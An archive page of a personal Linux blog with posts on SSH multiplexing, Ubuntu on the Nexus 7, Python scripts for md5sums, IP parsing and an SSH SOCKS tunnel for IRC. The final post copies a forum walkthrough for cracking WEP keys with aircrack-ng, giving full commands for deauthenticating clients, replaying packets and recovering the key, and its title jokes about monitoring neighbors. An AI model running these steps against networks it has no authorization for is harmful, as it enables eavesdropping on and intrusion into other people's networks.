Archive

Archive for the ‘Linux’ Category

Back to the grind – SSH Multiplexing – say wha?????

February 17, 2015 Leave a comment

So, It’s been quite a while since I posted anything on this blog. Thought I would get back into the swing of things.  I have tons of updates but lately very little time.   I think I’ll try to dedicate at least an hour a week to get something up here if not more.

For now, thought I would add to the latest linux tips n tricks I use to post.

SSH Multiplexing

I knew about this for quite a while but never really used it,  lately for the past few months it’s been a life saver. On avg during the course of my workday, I’m accessing 5-10 systems. This results to an ugly infestation of terminal windows, which surprisingly I have mastered the art of organizing thanks to tmux.

Anyways, what this allows you to do is use 1 TCP connection for each server you connect into.  Any additional SSH requests created from your client will use existing connection already established.  Cutting your login time in half.

Modify your existing ~/.ssh/config file and add the following:

Host *
   ControlMaster auto
   ControlPath ~/.ssh/master-%r@%h:%p

ControlMaster auto tells ssh to try to start a master if none is running, or to use an existing master otherwise. ControlPath is the location of a socket for the ssh processes to communicate among themselves. The %r, %h and %p are replaced with your user name, the host to which you’re connecting and the port number—only ssh sessions from the same user to the same host on the same port can or should share a TCP connection, so each group of multiplexed ssh processes needs a separate socket.

That’s it!!!

To test this, initiate a single ssh connection to any server. In a new window create another ssh connection to the same server. You should immediately see a difference the 2nd time around.

I would like to thank the Linux Journal for this cool tip, I had a 5 year old bookmark that I stumbled over a few months back that got me hooked.   You can find it Here

For now, I’m off, check back later.

Advertisements

Ubuntu 13.04 now available for the Google Nexus 7

December 7, 2012 Leave a comment

Hey All,

Nexus7 Running Raring 13.04

Today was the official announcement for the Nexus 7 supporting 13.04, for all you Nexus7 users that may have missed todays ubuntu meeting on Freenode.

This week we announced that the 13.04 build is available for download. New features include:

Added the oem installer, so no more preinstalled images!! Users can select their desired Language / Time Zone and Username

The ubuntu-installer-nexus7 was recently updated to rev 1.7 , this new version now flashes the 13.04 daily builds
For those of you that may not have the installer, you can go grab it @ https://launchpad.net/~ubuntu-nexus7/+archive/ubuntu-nexus7-installer

If some of you want to dist-upgrade from 12.10 -> 13.04 then you may hit some known issues.

Please refer to the following bugs:

http://pad.lv/1087295
http://pad.lv/1087335

These are the only bugs I found when dist-upgrading. We are urging everyone to re-flash if you don’t want to deal with the workarounds.

Serial Debug is a new feature that was recently added for 13.04, to enable and use, simply plug the usb cable into the Nexus7, connect to your computer and via a terminal type:

  • “screen /dev/ttyACM0 115200”

This should drop you into a login prompt. To kill, issue “ctrl-a k”

Refer to the wiki for more info @ https://wiki.ubuntu.com/Nexus7/

Enjoy!
-Sean

Categories: Linux Tags: , , , ,

Generating a clean MD5 Sum check file in python3

October 18, 2012 Leave a comment

This week I was stuck on a small problem involving me to generate hash sums for validation. Since I’ve been working on a automation project at work focusing on creating 100% hands free testing tools. A part of my test called for some basic procedures but I wanted to verify that the integrity of the data was sane. The original script that I was updating was written in Bash. Pretty much straight forward but yet, still room for improvement!  I decided to revise the script and convert it over to python, doing so would also make a more powerful tool giving the versatility that python has over simple bash scripts. src and dst are 2 parameters that are called elsewhere in the script. Essentially they are strings pointing to a path on your hard disk, for example dst = “/tmp/blah/blah/”


def prepimage(src, dst):
    '''
    Obtain sample files
    '''
    filename = "%s/md5sum.txt" % (dst)
    md5path = "%s/" % (dst)
    print ("Copying data and Generating md5sums")
    if not os.path.exists(dst):
        shutil.copytree(src, dst)

    #Generate md5sums
        list = subprocess.check_output(["ls", dst],universal_newlines=True)
        plist = list.split('\n')[0:2]
        f = open(filename, "wt")
        for item in plist:
           out = subprocess.Popen(['md5sum', item], universal_newlines=True\
                 , stdout=subprocess.PIPE, cwd='%s' % dst).communicate()[0]
           f.write(out)
        f.close()
    return 0

Lines 7 – 9 are simply creating my directory if it doesn’t exist.

We start @ Line 12,

list = subprocess.check_output(["ls", dst],universal_newlines=True)
        plist = list.split('\n')[0:2]

Using subprocess.Popen we kick of an “ls” command. dst is an argument that we set earlier pointing to a random directory. This will now give us output of something like this:

‘How fast.ogg\nJosh Woodward – Swansong.ogg\nmd5sum.txt\n’

the 2nd line will split the string using the delimiter \n to give us:

[‘How fast.ogg’, ‘Josh Woodward – Swansong.ogg’]

Now using this list, we can create a new file as I do in 14 and kick off a for loop to run md5sum against each entry in the list and write the output to our new file. The final output will look just like this:

cat /tmp/optical-test/Ubuntu_Free_Culture_Showcase/md5sum.txt 6e34a2a0eaa61748ba3a33015a84e813 How fast.ogg c9459a907b9345b289ba6c9e6517d4c2 Josh Woodward – Swansong.ogg

On the flip side, you can automate the integrity check by creating a new function and adding:


#Verify md5checksum
checkoutput = subprocess.Popen(['md5sum', '-c', 'md5sum.txt']
, universal_newlines=True, stdout=subprocess.PIPE\
, cwd='/media/CDROM/').communicate()[0]

Which should output:

How fast.ogg: OK

Josh Woodward – Swansong.ogg: OK

 

—————————————————————————————–

Python 3 also makes use of hashlib to generate the hashsum.. If you don’t need a checksum file then heres some alternate code you can use!

import hashlib
...
...
filename = "/tmp/file1.txt"
...
file = open(filename, 'rb')
filedata = file.read()
file.close()
md5 = hashlib.md5()
md5.update(filedata)
md5sum = md5.hexdigest()
print (md5sum)

This would generate just the hashsums:

6e34a2a0eaa61748ba3a33015a84e813
c9459a907b9345b289ba6c9e6517d4c2

Connecting to an IRC server behind a firewall? I feel your pain!

September 29, 2012 Leave a comment

So I use Xchat daily and connect to a private IRC server to talk with my colleagues. I also have a BIP server in the office to record all of the IRC transcripts, this way I never miss any conversations regardless of the time of day. Because the BIP server is behind a firewall on the companies network I can’t access it from the outside.  For the past year I’ve been working around this by connecting to my companies firewall via ssh and creating a SOCKS tunnel then simply directing xchat to talk through my local SOCKS proxy.

To do this ,  open a terminal and issue:

ssh -CND <LOCAL_IP_ADDRESS>:<PORT> <USER>@<SSH HOST>

Ex: ssh -CND 192.168.1.44:9999 sfeole@companyfirewall.com

Starting ssh with -CND:

‘D’ Specifies a local “dynamic” application-level port forwarding. This works by allocating a socket to listen to port on the local side, optionally bound to the specified bind_address. It also adds compression to the datastream ‘C’ and the ‘N’ is a safeguard which protects the user from executing remote commands.

192.168.1.44 is my  IPv4 address

9999 is the local port i’m going to open and direct traffic through

After the SSH tunnel is open I now need to launch xchat, navigate to Settings -> Preferences -> Network Setup and configure xchat to use my local IP (192.168.1.44) and local port (9999) then press OK then Reconnect.

I should now be able to connect to the IRC server behind the firewall. Usually I run through this process a few times a day, so it becomes somewhat of a tedious annoyance after a while.

Recently I finished a cool python3 script that does all of this in quick command.

The following code will do the following:

1.) identify the ipv4 address of the interface device you specify

2.) configure xchat.conf to use the new ipv4 address and port specified by the user

3.) open the ssh tunnel using the SSH -CND command from above

4.) launch xchat and connect to your server (assuming you have it set to auto connect)

To use it simply run

$./xchat.py -i <interface> -p <port>

ex: $./xchat.py -i wlan0 -p 9999

the user can select wlan0 or eth0 and of course their desired port. When your done with the tunnel simply issue <Ctrl-C> to kill it and wala!

https://code.launchpad.net/~sfeole/+junk/xchat

#!/usr/bin/env python3
#Sean Feole 2012,
#
#xchat proxy wrapper, for those of you that are constantly on the go:
#   --------------  What does it do? ------------------
# Creates a SSH Tunnel to Proxy through and updates your xchat config
# so that the user does not need to muddle with program settings

import signal
import shutil
import sys
import subprocess
import argparse
import re
import time

proxyhost = "myhost.company.com"
proxyuser = "sfeole"
localusername = "sfeole"

def get_net_info(interface):
    """
    Obtains your IPv4 address
    """

    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def configure_xchat_config(Proxy_ipaddress, Proxy_port):
    """
    Reads your current xchat.conf and creates a new one in /tmp
    """

    in_file = open("/home/%s/.xchat2/xchat.conf" % localusername, "r")
    output_file = open("/tmp/xchat.conf", "w")
    for line in in_file.readlines():
        line = re.sub(r'net_proxy_host.+', 'net_proxy_host = %s'
                 % Proxy_ipaddress, line)
        line = re.sub(r'net_proxy_port.+', 'net_proxy_port = %s'
                 % Proxy_port, line)
        output_file.write(line)
    output_file.close()
    in_file.close()
    shutil.copy("/tmp/xchat.conf", "/home/%s/.xchat2/xchat.conf"
                 % localusername)

def ssh_proxy(ProxyAddress, ProxyPort, ProxyUser, ProxyHost):
    """
    Create SSH Tunnel and Launch Xchat
    """

    ssh_address = "%s:%i" % (ProxyAddress, ProxyPort)
    user_string = "%s@%s" % (ProxyUser, ProxyHost)
    ssh_open = subprocess.Popen(["/usr/bin/ssh", "-CND", ssh_address,
                 user_string], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

    time.sleep(1)
    print ("")
    print ("Kill this tunnel with Ctrl-C")
    time.sleep(2)
    subprocess.call("xchat")
    stat = ssh_open.poll()
    while stat is None:
        stat = ssh_open.poll()

def main():
    """
    Core Code
    """

    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    parser.add_argument('-p', '--port',
                        help="Select the internal port you wish to bind to",
                        required=True, type=int)
    args = parser.parse_args()

    proxyip = (get_net_info("%s" % args.interface))
    configure_xchat_config(proxyip, args.port)
    print (proxyip, args.port, proxyuser, proxyhost)

    ssh_proxy(proxyip, args.port, proxyuser, proxyhost)

if __name__ == "__main__":
    sys.exit(main())

Refer to the launchpad address above for more info.

Simple Python3 Code to parse your ipaddress

September 27, 2012 Leave a comment

I’ve been doing some side projects on my own requiring me to obtain my assigned IPv4 address.  In python3 you can do this by importing socket, which I believe is a better way than how I’m doing it below, however I found that using subprocess solved the issue!

I just put this together tonight and it does exactly what I wanted it to do. Feel free to copy and use it for your own little projects, you will need to add additional logic to the parser for additional network interfaces.

#!/usr/bin/env python3

import sys
import subprocess
import argparse

def get_net_info(interface):
    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def main():
#Parser Code
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    args = parser.parse_args()

#    print ("%s" % args.interface)
    print (get_net_info("%s" % args.interface))

if __name__ == "__main__":
    sys.exit(main())

Heres the expected output below, in the event the device in question is NOT configured (unplugged/unplumbed), the following should output:

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i eth0
Please Confirm that your Network Device is Configured

And here is the expected output when the device is configured(plugged in and plumbed)

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i wlan0
192.168.1.44

And of course , invalid arguements…

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i www
usage: sean3.py [-h] -i {eth0,wlan0}
sean3.py: error: argument -i/–interface: invalid choice: ‘www’ (choose from ‘eth0’, ‘wlan0’)

Ubuntu 12.10 Amazon Search, HOW TO REMOVE

September 24, 2012 1 comment

So it’s been quite a long time since my last post. Frankly I’ve been busy with work/personal life, spending time with my little girl and catching up on random chores in and out of the house. Everyone can relate I’m sure.

Well , so new info!! Some of you know that Ubuntu 12.10 Quantal Quetzal release is right around the corner. I’ve been using it since Beta1 and I have to say it’s coming along nicely. A new feature that has some users in an uproar is the Amazon Search feature in Dash. Whenever searching for new items using the Search Lens the system will now poll results from Amazon.com.

Here’s an example:

I search for Music and note the results from Amazon which populate in as I wait…

To Remove this, Open a Terminal Window <Ctrl-Alt-T>

$sudo apt-get remove unity-lens-shopping

Logout and LogBack then search for MUSIC again

All Fixed.

Hope this helps!! and Enjoy the new 12.10 Features!<

Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

March 8, 2012 5 comments

So I wanted to show users how to sniff out their local wireless traffic , capture it and decrypt it.  However, before I made up a long winded post I decided to research it, see if someone else has done the work already. Sure enough someone has, so take a look at the following link. The article is geared for identifying wireless security holes and exploting them. But i’ll let you read the rest. It’s not advanced stuff, you can learn more about aircrack-ng in still interested.

I’ve copied the posters conents here, if you don’t want to deal with the link. If you want the screenshots, you’l have to sign into the forums.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0” as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
4. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
  • Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng –channel <channel> –write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng –channel <channel> –bssid 00:09:5B:D7:43:A8 –write <file_name> <interface>

    NOTE:
    –channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    –bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    –write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ‘0’ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful 🙂

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

Categories: Linux Tags: , , , ,